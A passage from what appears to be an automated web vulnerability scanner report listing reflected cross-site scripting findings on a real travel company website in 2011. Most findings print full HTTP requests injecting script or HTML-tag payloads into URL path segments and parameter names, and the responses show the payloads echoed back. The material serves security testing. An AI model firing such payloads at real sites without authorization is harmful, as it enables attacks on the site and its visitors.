Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621755; expires=Tue, 02-Oct-2012 01:02:35 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A2%3Bs%3A67%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts19a8e293c4186d9d9cfab9cf%2F%22%3Bi%3A3%3Bs%3A58%3A%22%2Fproducts_services%2Ftravel_agency%2F19a8e293e5add7d2a5f3772f%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:02:35 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13863


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>ff4ccfafe83">script%3E101846b934638a21<a>ff4ccfafe83</a>
...[SNIP]...
4.381. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4977"><script>alert(1)</script>d04db2b8ad1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/imagesa4977"><script>alert(1)</script>d04db2b8ad1/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:03:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621789; expires=Tue, 02-Oct-2012 01:03:09 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A4%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:03:09 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14090


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/imagesa4977"><script>alert(1)</script>d04db2b8ad1/images">
...[SNIP]...
4.382. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2f56c<a>259623de4a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images2f56c<a>259623de4a6/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:03:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621795; expires=Tue, 02-Oct-2012 01:03:15 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:03:15 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13844


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>259623de4a6">images2f56c<a>259623de4a6</a>
...[SNIP]...
4.383. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62f34"><script>alert(1)</script>288b2c2fbbd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images62f34"><script>alert(1)</script>288b2c2fbbd/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:04:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621874; expires=Tue, 02-Oct-2012 01:04:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:04:34 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14054


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images62f34"><script>alert(1)</script>288b2c2fbbd/loadingAnimation.gif">
...[SNIP]...
4.384. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5800b<a>6c1831f5800 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images5800b<a>6c1831f5800/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:04:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621876; expires=Tue, 02-Oct-2012 01:04:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:04:36 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13825


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>6c1831f5800">images5800b<a>6c1831f5800</a>
...[SNIP]...
4.385. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 767b3<a>1193ca6ed29 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif767b3<a>1193ca6ed29 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:06:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621966; expires=Tue, 02-Oct-2012 01:06:06 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:06:06 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13806


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>1193ca6ed29">loadingAnimation.gif767b3<a>1193ca6ed29</a>
...[SNIP]...
4.386. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87d0d"><a>7693b842da8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif87d0d"><a>7693b842da8 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:05:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621929; expires=Tue, 02-Oct-2012 01:05:29 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:05:29 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13810


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif87d0d"><a>7693b842da8">
...[SNIP]...
4.387. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b15cd"><a>deef725b16f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif?b15cd"><a>deef725b16f=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:01:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621673; expires=Tue, 02-Oct-2012 01:01:13 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:01:14 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13816


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif?b15cd"><a>deef725b16f=1">
...[SNIP]...
4.388. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0230<a>e4b2ad84e07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif?e0230<a>e4b2ad84e07=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:01:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621687; expires=Tue, 02-Oct-2012 01:01:27 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:01:27 GMT
Pragma: no-cache
Connection: close
